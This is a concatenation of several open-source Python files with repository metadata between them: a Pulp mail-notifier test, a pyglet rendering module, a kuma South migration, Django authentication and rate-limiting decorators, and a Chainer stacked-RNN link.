def test_email_serialize_objid(self, mock_smtp, mock_getbool, mock_task_ser):
event_with_id = data.Event('test-1', {'foo': _test_objid()})
mock_task_ser.return_value = 'serialized task'
# no TypeError = success
mail.handle_event(self.notifier_config, event_with_id)
class TestSystem(unittest.TestCase):
# test integration with the event system
def setUp(self):
self.notifier_config = {
'subject': 'hello',
'addresses': ['[email protected]', '[email protected]']
}
self.event_doc = {
'notifier_type_id': mail.TYPE_ID,
'event_types': data.TYPE_REPO_SYNC_FINISHED,
'notifier_config': self.notifier_config,
}
@mock.patch('pulp.server.event.data.task_serializer')
# don't actually spawn a thread
@mock.patch('threading.Thread', new=dummy_threading.Thread)
# mock qpid, because it freaks out over dummy_threading
@mock.patch('pulp.server.managers.event.remote.TopicPublishManager')
# don't actually send any email
@mock.patch('smtplib.SMTP')
# act as if the config has email enabled
@mock.patch('ConfigParser.SafeConfigParser.getboolean', return_value=True)
# inject fake results from the database query
@mock.patch('pulp.server.db.model.event.EventListener.get_collection')
def test_fire(self, mock_get_collection, mock_getbool, mock_smtp, mock_publish, mock_task_ser):
# verify that the event system will trigger listeners of this type
mock_get_collection.return_value.find.return_value = [self.event_doc]
mock_task_ser.return_value = 'serialized task'
event = data.Event(data.TYPE_REPO_SYNC_FINISHED, 'stuff')
factory.initialize()
factory.event_fire_manager()._do_fire(event)
# verify that the mail event handler was called and processed something
self.assertEqual(mock_smtp.return_value.sendmail.call_count, 2)
| gpl-2.0 | 8,384,764,055,739,574,000 | 42.27972 | 99 | 0.665697 | false |
siggame/PyVis | pyz/renderer.py | 1 | 14635 | '''
The renderer is responsible for building the primitives and complex objects to be drawn by pyglet. This module also contains various base classes for primitives that can be modified on the fly.
'''
from copy import copy
from pyglet import clock
from pyglet import gl
from pyglet import graphics
import math
class Drawable(object):
x = property(
lambda self: self._x,
lambda self, x: self.transform(translate=(x, self._y)))
y = property(
lambda self: self._y,
lambda self, y: self.transform(translate=(self._x, y)))
width = property(
lambda self: self._width,
lambda self, width: self.transform(scale=(width, self._height))
)
height = property(
lambda self: self._height,
lambda self, height: self.transform(scale=(self._width, height))
)
color = property(
lambda self: self._color,
lambda self, color: self.transform(color=color)
)
class Primitive(Drawable):
'''
This is the base class for any primitive to draw to the screen. To be used most effectively, all library-provided primitives should be declared within :class:`renderer.Renderer`.
:param renderer: renderer instance to add this primitive to.
:type renderer: :class:`renderer.Renderer`
:raises: AttributeError if renderer is not passed to constructor and not instantiated from an instance of a renderer
'''
def __init__(self, renderer=None, offset=(0, 0)):
self.off_x, self.off_y = offset
self.vertex_list = None
if not renderer:
try:
renderer = self.renderer
except AttributeError as e:
print(
'''You must either pass in renderer argument to '''
'''the primitive or use renderer.Primitive()''')
raise e
else:
self.renderer = renderer
class Composite(Drawable):
'''
This is the base class for any object that uses one or more primitives to function.
'''
def __init__(self, renderer):
self.primitives = []
self._renderer = renderer
def transform(self, translate=None, scale=None, rotate=None):
if scale:
            raise Exception('This needs to be overridden by the composite '
                            'you wish to scale.')
for p in self.primitives:
p.transform(translate=translate, rotate=rotate)
class Renderer(object):
'''
This class allows access to the primitives (the basic drawing building blocks) to draw just about anything. Widgets should use these to draw themselves::
class Button(RectWidget):
def __init__(self, renderer, x, y, width, height, text):
btn_base = renderer.Rectangle(x, y, width, height,
color=(0.2, 0.3, 0.2))
btn_text = renderer.Text(x, y, width, height, text)
# etc.
# etc.
primitives should be called through the Renderer instance instead of through the class (i.e.)::
renderer = Renderer()
renderer.Rectangle()
instead of::
renderer = Renderer()
Renderer.Rectangle(renderer=renderer)
There is special python magic to make that work. See `__init__()` for that.
'''
fg_color = (1, 0.5, 0.5, 1)
bg_color = (1, 1, 1, 1)
texture = None
def __init__(self):
self.fps_display = clock.ClockDisplay()
self.init_frame()
self.frame = graphics.Batch()
# -*- WARNING -*-
# -*- Python magic -*-
# Luckily this only has to be called once per renderer
# and per program there is on average 1.0 renderer
# (Actually it might be useful to have two of these...)
# Finds all classes in Renderer that inherit Primitive
# at some point, and for each, creates a copy for this
# instance and sets the renderer attribute for each
# to this instance.
# This is just so we can do stuff like renderer.Rectangle()
# without having to pass in the renderer because that doesn't
# make any sense.
# -*- Python magic -*-
# -*- WARNING -*-
for name in dir(self):
cls = getattr(self, name)
if hasattr(cls, '__mro__') and Primitive in cls.__mro__:
setattr(self, name, type(name, (cls,), dict(renderer=self)))
def init_frame(self):
'''
This method should be called at the beginning of every game loop.
It does the pre-loop set up, if any.
:rtype: None
'''
pass
def draw_frame(self):
'''
This method should be called at (or near) the end of every game loop after all the objects have been updated and are ready to draw to the screen.
This will draw the batch associated with the renderer.
:rtype: None
'''
self.frame.draw()
self.fps_display.draw()
class Arc(Primitive):
'''
This class creates an arc primitive for which circles and pies (yum!) can be created.
:param x: The x offset (from the left side of the screen) to the arc center
:type x: float
:param y: The y offset (from the bottom of the screen) to the arc center
:type y: float
:param radius: The radius of the arc
:type radius: float
:param points: The number of vertices to make up the arc
:type points: int
:param start: The starting position of the pie in degrees
:type start: float
:param end: The ending position of the pie in degrees
:type end: float
:param filled: The arc appears as a pie because it will be filled with color
:type filled: bool
:param loop: If not filled, this will set whether the first and last points join at the middle or just an arc is created.
:type loop: bool
'''
def __init__(self, x, y, radius, points=20, texture=None, group=None, color=None,
filled=True, loop=True, start=0, end=360, **kwargs):
super(Renderer.Arc, self).__init__(**kwargs)
self._x, self._y = x, y
self._radius = radius
self._points = points
self._start, self._end = start, end
self._filled = filled
self._loop = loop
if not color:
color = self.renderer.fg_color
data = [
('v2f', (0,) * points * 2),
('c4f', (color) * points)
]
if texture:
raise Exception('Not Yet Implemented')
'''
data += [
('t2f',
(0, 0,
1, 0,
1, 1,
0, 1))
]
group = graphics.TextureGroup(texture, parent=group)
'''
indices = []
if filled:
# TODO: Change this to gl.GL_TRIANGLE_FAN when pyglet has fixed its
# allocator issues around TRIANGLE_FANs and LINE_LOOPs
mode = gl.GL_TRIANGLES
for p in range(points - 1):
indices += [0, p, p + 1]
else:
for p in range(points - 1):
indices += [p, p + 1]
if loop:
indices = [0, 1] + indices + [points - 1, 0]
mode = gl.GL_LINES
self.vertex_list = self.renderer.frame.add_indexed(points, mode,
group, indices, *data)
self.transform()
def transform(self, translate=None, scale=None, rotate=None,
start=None, end=None):
'''
This transform method actually modifies the vertex lists to update the positions of the polygons. This is most efficient when in unit-mode where only one unit is moving at a time.
This is because at this point very few objects are moving per frame. So all objects that have not moved take up zero cpu time.
This may not be as efficient when applied to normal, condensed, or liquid mode because far more polygons will be moving at the same time. It may be better to draw each vertex list separately after having gone through a matrix transformation.
As a final note, it may be best to move these primitives into a class built in cython so that python doesn't have to deal with all this bullshit processing.
As an addendum to my final note, it may be sufficient to move this processing to another python process (see multiprocessing), instead of using cython.
Or just use both.
:param translate: The new position.
:type translate: 2-tuple of float or int
:param scale: The new scale.
:type scale: 2-tuple of float or int
'''
if translate:
self._x, self._y = translate
if scale:
self._radius = scale
if start:
self._start = start
if end:
self._end = end
start = math.radians(self._start)
end = math.radians(self._end)
if self._filled or self._loop:
point_count = self._points - 1
else:
point_count = self._points
interval = (end - start) / (point_count - 1)
points = []
t = start
for p in range(point_count):
x = (self._x + self.off_x) + self._radius * math.cos(t)
y = (self._y + self.off_y) + self._radius * math.sin(t)
points += [x, y]
t += interval
if self._filled or self._loop:
if not self._filled and self._start % 360 == self._end % 360:
points = points[0:2] + points
else:
points = [self._x + self.off_x, self._y + self.off_y] + points
self.vertex_list.vertices[:] = points
radius = property(
lambda self: self._radius,
lambda self, radius: self.transform(radius=radius)
)
start = property(
lambda self: self._start,
lambda self, start: self.transform(start=start)
)
end = property(
lambda self: self._end,
lambda self, end: self.transform(end=end)
)
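    # Illustrative sketch (assumes a pyglet window and event loop are set up
    # elsewhere): draw a filled quarter "pie" centred at (100, 100).
    #
    #     renderer = Renderer()
    #     pie = renderer.Arc(100, 100, 50, start=0, end=90,
    #                        color=(0.2, 0.6, 0.2, 1), filled=True)
    #     # inside the pyglet on_draw handler:
    #     renderer.draw_frame()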
class Rectangle(Primitive):
'''
This class creates a rectangle primitive.
:param x: the x offset (from the left side of the screen) to draw the rectangle.
:type x: float
:param y: is the y offset (from the bottom of the screen) to draw the rectangle.
:type y: float
:param width: is the width of the rectangle
:type width: float
:param height: is the height of the rectangle
:type height: float
:param texture: is the texture to paint the rectangle with
:type texture:
:param group: is the group, if any, that the rectangle should be associated with. Using texture will automatically make this a part of the appropriate TextureGroup and make *group* its parent.
:type group: Group
:param color: is the color to paint the rectangle. If not specified, the renderer's default `fg_color` will be used instead.
:type color: 3-tuple or 4-tuple of floats from 0 to 1
:param filled: specified whether to draw this as a filled-in rectangle or rectangle outline.
:type filled: bool
'''
def __init__(self, x, y, width, height, texture=None,
group=None, color=None, filled=True, **kwargs):
super(Renderer.Rectangle, self).__init__(**kwargs)
self._x, self._y = x, y
self._width, self._height = width, height
if not color:
self._color = self.renderer.fg_color
else:
self._color = color
data = [
('v2f', (0,) * 8),
('c4f', (self._color) * 4)
]
if texture:
data += [
('t2f',
(0, 0,
1, 0,
1, 1,
0, 1))
]
group = graphics.TextureGroup(texture, parent=group)
if filled:
# TODO: Change this to gl.GL_TRIANGLE_FAN when pyglet has fixed its
# allocator issues around TRIANGLE_FANs and LINE_LOOPs
mode = gl.GL_TRIANGLES
indices = [0, 1, 2, 0, 2, 3]
else:
mode = gl.GL_LINES
indices = [0, 1, 1, 2, 2, 3, 3, 0]
self.vertex_list = self.renderer.frame.add_indexed(4, mode, group,
indices, *data)
self.transform()
def transform(self, translate=None, scale=None, rotate=None, color=None):
'''
This transform method actually modifies the vertex lists to update the positions of the polygons. This is most efficient when in unit-mode where only one unit is moving at a time.
This is because at this point very few objects are moving per frame. So all objects that have not moved take up zero cpu time.
This may not be as efficient when applied to normal, condensed, or liquid mode because far more polygons will be moving at the same time. It may be better to draw each vertex list separately after having gone through a matrix transformation.
As a final note, it may be best to move these primitives into a class built in cython so that python doesn't have to deal with all this bullshit processing.
:param translate: The new position.
:type translate: 2-tuple of float or int
:param scale: The new scale.
:type scale: 2-tuple of float or int
'''
if color and color != self._color:
self._color = color
self.vertex_list.colors[:] = (color) * 4
if translate:
self._x, self._y = translate
if scale:
self._width, self._height = scale
x = self._x + self.off_x
y = self._y + self.off_y
self.vertex_list.vertices[:] = [
x, y,
x + self._width, y,
x + self._width, y + self._height,
x, y + self._height
]
| bsd-3-clause | 2,768,834,429,942,911,000 | 33.928401 | 254 | 0.553263 | false |
davidyezsetz/kuma | kuma/search/migrations/0008_auto__add_field_filtergroup_slug.py | 5 | 4651 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'FilterGroup.slug'
db.add_column('search_filtergroup', 'slug',
self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'FilterGroup.slug'
db.delete_column('search_filtergroup', 'slug')
models = {
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'search.filter': {
'Meta': {'unique_together': "(('name', 'slug'),)", 'object_name': 'Filter'},
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'filters'", 'to': "orm['search.FilterGroup']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'operator': ('django.db.models.fields.CharField', [], {'default': "'OR'", 'max_length': '3'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'})
},
'search.filtergroup': {
'Meta': {'ordering': "('-order', 'name')", 'object_name': 'FilterGroup'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
'search.index': {
'Meta': {'ordering': "['-created_at']", 'object_name': 'Index'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'populated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'promoted': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'search.outdatedobject': {
'Meta': {'object_name': 'OutdatedObject'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'outdated_objects'", 'to': "orm['search.Index']"}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {})
},
'taggit.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'})
},
'taggit.taggeditem': {
'Meta': {'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_tagged_items'", 'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_items'", 'to': "orm['taggit.Tag']"})
}
}
complete_apps = ['search']
| mpl-2.0 | 8,975,264,999,760,554,000 | 59.402597 | 174 | 0.546764 | false |
miing/mci_migo | webui/decorators.py | 1 | 10822 | # Copyright 2010 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
import functools
import logging
from datetime import datetime, timedelta
from functools import wraps
from hashlib import sha1
from django.contrib import messages
from django.contrib.auth import REDIRECT_FIELD_NAME, logout
from django.contrib.auth.decorators import (
login_required as django_login_required,
)
from django.conf import settings
from django.contrib.auth.views import redirect_to_login
from django.core.cache import cache
from django.core.urlresolvers import reverse
from django.http import (
Http404,
HttpResponseForbidden,
HttpResponseRedirect,
)
from django.template import RequestContext
from django.template.loader import render_to_string
from django.template.response import TemplateResponse
from django.utils.decorators import available_attrs
from django.utils.http import urlencode
from django.utils.translation import ugettext as _
from identityprovider.cookies import set_test_cookie, test_cookie_worked
from identityprovider.models import twofactor
from identityprovider.views.utils import get_rpconfig_from_request
EMAIL_INVALIDATED = _(
'We received a request to remove the email address {email} from your '
'account. This email address was previously linked to your account but '
'was never verified by you. You will no longer be able to login to your '
'account using {email}.'
)
def redirect_home_if_logged_in(func):
@functools.wraps(func)
def _redirect_home_if_logged_in(request, *args, **kwargs):
if request.user.is_authenticated():
return HttpResponseRedirect('/')
else:
return func(request, *args, **kwargs)
return _redirect_home_if_logged_in
def dont_cache(func):
def _dont_cache_decorator(request, *args, **kwargs):
response = func(request, *args, **kwargs)
response["Expires"] = "Tue, 03 Jul 2001 06:00:00 GMT"
response["Cache-Control"] = ("no-store, no-cache, "
"must-revalidate, max-age=0")
response['Pragma'] = 'no-cache'
return response
return _dont_cache_decorator
def _has_only_invalidated_emails(request):
# user has *zero* usable email addresses, log him/her out
if request.user.emailaddress_set.count() == 0:
logout(request)
return TemplateResponse(
request, 'account/user_logged_out_no_valid_emails.html')
def _has_invalidated_emails_add_warning(request):
emails = request.user.invalidatedemailaddress_set.filter(
account_notified=False).order_by('date_invalidated')
if len(emails) > 0:
invalid = emails[0]
messages.warning(request, EMAIL_INVALIDATED.format(email=invalid))
invalid.account_notified = True
invalid.save()
def sso_login_required(function=None, redirect_field_name=REDIRECT_FIELD_NAME,
login_url=None, require_twofactor=False,
require_twofactor_freshness=False):
"""Wrap up django's login_required, and also checks for 2f."""
def decorator(view_func):
@wraps(view_func, assigned=available_attrs(view_func))
def _wrapped_view(request, *args, **kwargs):
response = _has_only_invalidated_emails(request)
if response:
return response
_has_invalidated_emails_add_warning(request)
rpconfig = get_rpconfig_from_request(request, None)
u = request.user
required = (
require_twofactor or
twofactor.user_requires_twofactor_auth(request, u) or
twofactor.site_requires_twofactor_auth(request, None, rpconfig)
)
require_auth = (
(required and not twofactor.is_upgraded(request)) or
(require_twofactor_freshness and
not twofactor.is_fresh(request))
)
if require_auth:
# only valid reverse arg is token
reverse_args = {}
if 'token' in kwargs and kwargs['token'] is not None:
reverse_args['token'] = kwargs['token']
return redirect_to_login(
request.get_full_path(),
reverse('twofactor', kwargs=reverse_args),
redirect_field_name,
)
return view_func(request, *args, **kwargs)
return django_login_required(
_wrapped_view, redirect_field_name, login_url,
)
if function:
return decorator(function)
return decorator
def check_readonly(func):
"""A readonly aware decorator.
The decorated view will not be accessible at all during readonly mode.
Instead, a static warning page will be displayed.
"""
def wrapper(request, *args, **kwargs):
if settings.READ_ONLY_MODE:
html = render_to_string(
'readonly.html',
{'readonly': False},
context_instance=RequestContext(request)
)
return HttpResponseForbidden(html)
return func(request, *args, **kwargs)
functools.update_wrapper(wrapper, func)
return wrapper
disable_cookie_check = False
def requires_cookies(func):
@functools.wraps(func)
def wrapper(request, *args, **kwargs):
if disable_cookie_check or test_cookie_worked(request):
return func(request, *args, **kwargs)
quoted = urlencode({'next': request.get_full_path()})
return set_test_cookie(HttpResponseRedirect('/+cookie?' + quoted))
return wrapper
def require_twofactor_enabled(func):
@wraps(func)
def wrapped(request, *args, **kwargs):
if not twofactor.is_twofactor_enabled(request):
raise Http404('Switch \'TWOFACTOR\' is not active')
return func(request, *args, **kwargs)
return wrapped
class ratelimit(object):
""" A rate-limiting decorator.
Strongly based on Simon Willison's code,
http://github.com/simonw/ratelimitcache/blob/master/ratelimitcache.py
"""
# This class is designed to be sub-classed
minutes = 2 # The time period
requests = 20 # Number of allowed requests in that time period
prefix = 'rl-' # Prefix for memcache key
def __init__(self, **options):
        # Explicitly set the name to pretend we're a function, so this
        # decorator also works with django's method_decorator function.
self.__name__ = self.__class__.__name__
for key, value in options.items():
setattr(self, key, value)
def __call__(self, fn):
def wrapper(request, *args, **kwargs):
return self.view_wrapper(request, fn, *args, **kwargs)
functools.update_wrapper(wrapper, fn)
return wrapper
def view_wrapper(self, request, fn, *args, **kwargs):
if not self.should_ratelimit(request):
return fn(request, *args, **kwargs)
counts = self.get_counters(request).values()
# Increment rate limiting counter
self.cache_incr(self.current_key(request))
# Have they failed?
if sum(int(x) for x in counts) >= self.requests:
return self.disallowed(request)
return fn(request, *args, **kwargs)
def cache_get_many(self, keys):
return cache.get_many(keys)
def cache_incr(self, key):
        # memcache is the only backend that can increment atomically
try:
# add first, to ensure the key exists
cache.add(key, 0, timeout=self.expire_after())
cache.incr(key)
except AttributeError:
cache.set(key, cache.get(key, 0) + 1, self.expire_after())
def should_ratelimit(self, request):
return True
def get_counters(self, request):
return self.cache_get_many(self.keys_to_check(request))
def keys_to_check(self, request):
extra = self.key_extra(request)
now = datetime.utcnow()
return [
'%s%s-%s' % (
self.prefix,
extra,
(now - timedelta(minutes=minute)).strftime('%Y%m%d%H%M')
) for minute in range(self.minutes + 1)
]
def current_key(self, request):
return '%s%s-%s' % (
self.prefix,
self.key_extra(request),
datetime.utcnow().strftime('%Y%m%d%H%M')
)
def remote_ip(self, request):
if 'HTTP_X_FORWARDED_FOR' in request.META:
remote_ip = request.META['HTTP_X_FORWARDED_FOR']
            # Because X-Forwarded-For can be a list of IPs, we need only the first one
remote_ip = remote_ip.split(',')[0].strip()
else:
remote_ip = request.META.get('REMOTE_ADDR')
return remote_ip
def key_extra(self, request):
# By default, their IP address is used
return self.remote_ip(request)
def disallowed(self, request):
remote_ip = self.remote_ip(request)
logger = logging.getLogger('ratelimit.disallowed')
def _get_name(user):
try:
return user.openid_identifier
except AttributeError:
return user.username
logger.warn("%s (%s) exceeded rate limit for %s",
_get_name(request.user), remote_ip, request.user.id)
return HttpResponseForbidden(render_to_string('limitexceeded.html'))
def expire_after(self):
"Used for setting the memcached cache expiry"
return (self.minutes + 1) * 60
def reset_count(self, request):
"Reset the rate limiting limit count for a request"
for key in self.keys_to_check(request):
cache.delete(key)
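# --- Illustrative usage sketch (editorial addition, not part of the original module).
# A minimal example of applying the ratelimit decorator with custom limits; the view
# name and the chosen limits are hypothetical.
@ratelimit(minutes=5, requests=100)
def _example_rate_limited_view(request):
    # Served normally until the per-IP counters exceed 100 hits within 5 minutes,
    # after which ratelimit.disallowed() returns an HTTP 403 response.
    ...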
class ratelimit_post(ratelimit):
"Rate limit POSTs - can be used to protect a login form"
key_field = None # If provided, this POST var will affect the rate limit
def should_ratelimit(self, request):
return request.method == 'POST'
def key_extra(self, request):
# IP address and key_field (if it is set)
extra = super(ratelimit_post, self).key_extra(request)
if self.key_field:
value = sha1(request.POST.get(self.key_field, '').encode('utf-8'))
extra += '-' + value.hexdigest()
return extra
class limitlogin(ratelimit_post):
"""Limit login POSTs, per username.
Also, take default values from settings.
"""
key_field = 'email'
def __init__(self, **options):
args = {
'minutes': getattr(settings, 'LOGIN_LIMIT_MINUTES', 2),
'requests': getattr(settings, 'LOGIN_LIMIT_REQUESTS', 20),
}
args.update(options)
super(limitlogin, self).__init__(**args)
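# --- Illustrative usage sketch (editorial addition, not part of the original module).
# limitlogin keys its counters on the source IP plus the POSTed 'email' field, so
# repeated attempts against one account are throttled independently of others. The
# view name is hypothetical, and Django settings are assumed to be configured.
@limitlogin()
def _example_login_view(request):
    # Process the POSTed credentials here; excess attempts receive the standard
    # limitexceeded.html 403 response from ratelimit.disallowed().
    ...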
| agpl-3.0 | 2,584,166,348,463,007,000 | 33.464968 | 79 | 0.622343 | false |
ktnyt/chainer | chainer/links/connection/n_step_rnn.py | 1 | 12945 | import numpy
import six
import chainer
from chainer.functions.array import permutate
from chainer.functions.array import transpose_sequence
from chainer.functions.connection import n_step_rnn as rnn
from chainer.initializers import normal
from chainer import link
from chainer.utils import argument
from chainer import variable
def argsort_list_descent(lst):
return numpy.argsort([-len(x) for x in lst]).astype(numpy.int32)
def permutate_list(lst, indices, inv):
ret = [None] * len(lst)
if inv:
for i, ind in enumerate(indices):
ret[ind] = lst[i]
else:
for i, ind in enumerate(indices):
ret[i] = lst[ind]
return ret
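# --- Illustrative sketch (editorial addition, not part of the original module).
# How the two helpers above work together: sequences are reordered by descending
# length before the RNN call and restored afterwards with inv=True. The sample
# lengths are hypothetical.
def _example_sort_and_restore():
    xs = [numpy.zeros(4), numpy.zeros(2), numpy.zeros(3)]
    indices = argsort_list_descent(xs)                        # [0, 2, 1]
    sorted_xs = permutate_list(xs, indices, inv=False)        # longest first
    restored = permutate_list(sorted_xs, indices, inv=True)   # original order
    assert [len(x) for x in restored] == [4, 2, 3]
    return indices, sorted_xs, restored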
class NStepRNNBase(link.ChainList):
"""__init__(self, n_layers, in_size, out_size, dropout)
Base link class for Stacked RNN/BiRNN links.
    This link is the base link class for :func:`chainer.links.NStepRNN` and
    :func:`chainer.links.NStepBiRNN`.
    This link's behavior depends on the ``use_bi_direction`` argument.
.. warning::
``use_cudnn`` argument is not supported anymore since v2.
Instead, use ``chainer.using_config('use_cudnn', use_cudnn)``.
See :func:`chainer.using_config`.
Args:
n_layers (int): Number of layers.
in_size (int): Dimensionality of input vectors.
out_size (int): Dimensionality of hidden states and output vectors.
dropout (float): Dropout ratio.
.. seealso::
:func:`chainer.links.NStepRNNReLU`
:func:`chainer.links.NStepRNNTanh`
:func:`chainer.links.NStepBiRNNReLU`
:func:`chainer.links.NStepBiRNNTanh`
""" # NOQA
def __init__(self, n_layers, in_size, out_size, dropout, **kwargs):
if kwargs:
argument.check_unexpected_kwargs(
kwargs,
use_cudnn='use_cudnn argument is not supported anymore. '
'Use chainer.using_config',
use_bi_direction='use_bi_direction is not supported anymore',
activation='activation is not supported anymore')
argument.assert_kwargs_empty(kwargs)
weights = []
if self.use_bi_direction:
direction = 2
else:
direction = 1
for i in six.moves.range(n_layers):
for di in six.moves.range(direction):
weight = link.Link()
with weight.init_scope():
for j in six.moves.range(self.n_weights):
if i == 0 and j < self.n_weights // 2:
w_in = in_size
elif i > 0 and j < self.n_weights // 2:
w_in = out_size * direction
else:
w_in = out_size
w = variable.Parameter(
normal.Normal(numpy.sqrt(1. / w_in)),
(out_size, w_in))
b = variable.Parameter(0, (out_size,))
setattr(weight, 'w%d' % j, w)
setattr(weight, 'b%d' % j, b)
weights.append(weight)
super(NStepRNNBase, self).__init__(*weights)
self.ws = [[getattr(layer, 'w%d' % i)
for i in six.moves.range(self.n_weights)]
for layer in self]
self.bs = [[getattr(layer, 'b%d' % i)
for i in six.moves.range(self.n_weights)]
for layer in self]
self.n_layers = n_layers
self.dropout = dropout
self.out_size = out_size
self.direction = direction
def init_hx(self, xs):
shape = (self.n_layers * self.direction, len(xs), self.out_size)
with chainer.using_device(self.device):
hx = variable.Variable(self.xp.zeros(shape, dtype=xs[0].dtype))
return hx
def rnn(self, *args):
"""Calls RNN function.
This function must be implemented in a child class.
"""
raise NotImplementedError
@property
def n_cells(self):
"""Returns the number of cells.
This function must be implemented in a child class.
"""
        raise NotImplementedError
def forward(self, hx, xs, **kwargs):
"""forward(self, hx, xs)
Calculate all hidden states and cell states.
.. warning::
``train`` argument is not supported anymore since v2.
Instead, use ``chainer.using_config('train', train)``.
See :func:`chainer.using_config`.
Args:
            hx (~chainer.Variable or None): Initial hidden states. If ``None``
                is specified, a zero vector is used. Its shape is ``(S, B, N)``
for uni-directional RNN and ``(2S, B, N)`` for
bi-directional RNN where ``S`` is the number of layers
and is equal to ``n_layers``, ``B`` is the mini-batch size,
and ``N`` is the dimension of the hidden units.
xs (list of ~chainer.Variable): List of input sequences.
Each element ``xs[i]`` is a :class:`chainer.Variable` holding
a sequence. Its shape is ``(L_t, I)``, where ``L_t`` is the
length of a sequence for time ``t``, and ``I`` is the size of
the input and is equal to ``in_size``.
Returns:
tuple: This function returns a tuple containing three elements,
``hy`` and ``ys``.
        - ``hy`` is the updated hidden states whose shape is the same as
          ``hx``.
        - ``ys`` is a list of :class:`~chainer.Variable`. Each element
          ``ys[t]`` holds the hidden states of the last layer corresponding
          to an input ``xs[t]``. Its shape is ``(L_t, N)`` for a
          uni-directional RNN and ``(L_t, 2N)`` for a bi-directional RNN,
          where ``L_t`` is the length of the sequence for time ``t``
          and ``N`` is the size of the hidden units.
"""
(hy,), ys = self._call([hx], xs, **kwargs)
return hy, ys
def _call(self, hs, xs, **kwargs):
"""Calls RNN function.
Args:
            hs (list of ~chainer.Variable or None): List of hidden states.
                Its length depends on the implementation.
                If ``None`` is specified, a zero vector is used.
xs (list of ~chainer.Variable): List of input sequences.
Each element ``xs[i]`` is a :class:`chainer.Variable` holding
a sequence.
Returns:
tuple: hs
"""
if kwargs:
argument.check_unexpected_kwargs(
kwargs, train='train argument is not supported anymore. '
'Use chainer.using_config')
argument.assert_kwargs_empty(kwargs)
assert isinstance(xs, (list, tuple))
indices = argsort_list_descent(xs)
xs = permutate_list(xs, indices, inv=False)
hxs = []
for hx in hs:
if hx is None:
hx = self.init_hx(xs)
else:
hx = permutate.permutate(hx, indices, axis=1, inv=False)
hxs.append(hx)
trans_x = transpose_sequence.transpose_sequence(xs)
args = [self.n_layers, self.dropout] + hxs + \
[self.ws, self.bs, trans_x]
result = self.rnn(*args)
hys = [permutate.permutate(h, indices, axis=1, inv=True)
for h in result[:-1]]
trans_y = result[-1]
ys = transpose_sequence.transpose_sequence(trans_y)
ys = permutate_list(ys, indices, inv=True)
return hys, ys
class NStepRNNTanh(NStepRNNBase):
"""__init__(self, n_layers, in_size, out_size, dropout)
Stacked Uni-directional RNN for sequences.
    This link is a stacked version of a uni-directional RNN for sequences.
    Note that the activation function is ``tanh``.
    It calculates the hidden states of all layers at end-of-string,
    and all hidden states of the last layer for each time step.
    Unlike :func:`chainer.functions.n_step_rnn`, this link automatically
    sorts inputs in descending order by length and transposes the sequences.
Users just need to call the link with a list of :class:`chainer.Variable`
holding sequences.
.. warning::
``use_cudnn`` argument is not supported anymore since v2.
Instead, use ``chainer.using_config('use_cudnn', use_cudnn)``.
See :func:`chainer.using_config`.
Args:
n_layers (int): Number of layers.
in_size (int): Dimensionality of input vectors.
out_size (int): Dimensionality of hidden states and output vectors.
dropout (float): Dropout ratio.
.. seealso::
:func:`chainer.functions.n_step_rnn`
"""
n_weights = 2
use_bi_direction = False
def rnn(self, *args):
return rnn.n_step_rnn(*args, activation='tanh')
@property
def n_cells(self):
return 1
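# --- Illustrative usage sketch (editorial addition, not part of the original module).
# A minimal example of calling the stacked RNN link above with variable-length
# sequences; the layer sizes and data are hypothetical.
def _example_n_step_rnn_tanh():
    rnn_link = NStepRNNTanh(n_layers=2, in_size=4, out_size=3, dropout=0.0)
    xs = [
        variable.Variable(numpy.random.randn(5, 4).astype(numpy.float32)),  # length 5
        variable.Variable(numpy.random.randn(2, 4).astype(numpy.float32)),  # length 2
    ]
    # hy has shape (n_layers, batch, out_size) = (2, 2, 3); each ys[i] has
    # shape (len(xs[i]), out_size).
    hy, ys = rnn_link(None, xs)
    return hy, ys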
